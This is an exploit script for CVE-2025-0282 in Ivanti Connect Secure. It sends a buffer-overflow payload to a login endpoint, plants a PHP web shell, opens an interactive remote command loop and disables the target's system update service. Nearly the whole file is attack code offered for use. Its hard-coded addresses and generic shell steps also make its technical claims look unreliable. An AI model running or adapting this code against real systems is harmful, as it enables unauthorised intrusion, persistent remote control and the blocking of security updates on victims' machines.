# Exploit Title: Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
# Date: 2025-01-11
# Exploit Author: @absholi7ly
# CVE: CVE-2025-0282
import requests
import sys
import struct
import socket
import ssl
import urllib3
import time
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):
payload = b"A" * offset # Fill the buffer
payload += struct.pack("<I", system_address) # Overwrite return address with system()
payload += b"BBBB" # Fake return address
payload += struct.pack("<I", command_address) # Address of the command
payload += command.encode() # Command to execute
return payload
def send_payload(target_ip, payload):
try:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)
ssl_sock.connect((target_ip, 443))
print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")
exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
http_request = (
f"POST {exploit_endpoint} HTTP/1.1\r\n"
f"Host: {target_ip}\r\n"
f"Content-Length: {len(payload)}\r\n"
f"Content-Type: application/x-www-form-urlencoded\r\n"
f"\r\n"
).encode() + payload
ssl_sock.send(http_request)
response = ssl_sock.recv(4096)
ssl_sock.close()
return response.decode(errors="replace")
except Exception as e:
print(f"[-] Error sending payload: {e}")
return None
def exploit_vulnerability(target_ip, command):
payload = create_exploit_payload(command)
response = send_payload(target_ip, payload)
if response:
print("[+] Payload sent successfully.")
else:
print("[-] No response received.")
def upload_web_shell(target_ip, local_shell_path):
try:
with open(local_shell_path, "r") as f:
web_shell_content = f.read()
command = f"echo '{web_shell_content}' > /shell.php"
exploit_vulnerability(target_ip, command)
print("[+] Web shell uploaded successfully at /shell.php.")
verify_shell(target_ip)
except Exception as e:
print(f"[-] Error uploading web shell: {e}")
def verify_shell(target_ip):
shell_url = f"http://{target_ip}/shell.php"
try:
response = requests.get(shell_url, verify=False, timeout=10)
if response.status_code == 200:
print("[+] Web shell is accessible.")
else:
print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
except Exception as e:
print(f"[-] Error verifying web shell: {e}")
def execute_shell_command(target_ip, command):
shell_url = f"http://{target_ip}/shell.php"
try:
# Sending the command via POST
response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
if response.status_code == 200:
print(f"[+] Command output:\n{response.text.strip()}")
else:
print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
except Exception as e:
print(f"[-] Error executing command via web shell: {e}")
def disable_updates(target_ip):
commands = [
"systemctl stop apt-daily.service",
"systemctl disable apt-daily.service"
]
for command in commands:
execute_shell_command(target_ip, command)
print("[+] System updates disabled successfully.")
def main():
if len(sys.argv) != 3:
print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
sys.exit(1)
target_ip = sys.argv[1]
local_shell_path = sys.argv[2]
# Upload the web shell
upload_web_shell(target_ip, local_shell_path)
while True:
command = input("Enter command to execute on the target (or 'exit' to quit): ")
if command.lower() == "exit":
print("Exiting...")
break
execute_shell_command(target_ip, command)
if __name__ == "__main__":
main()
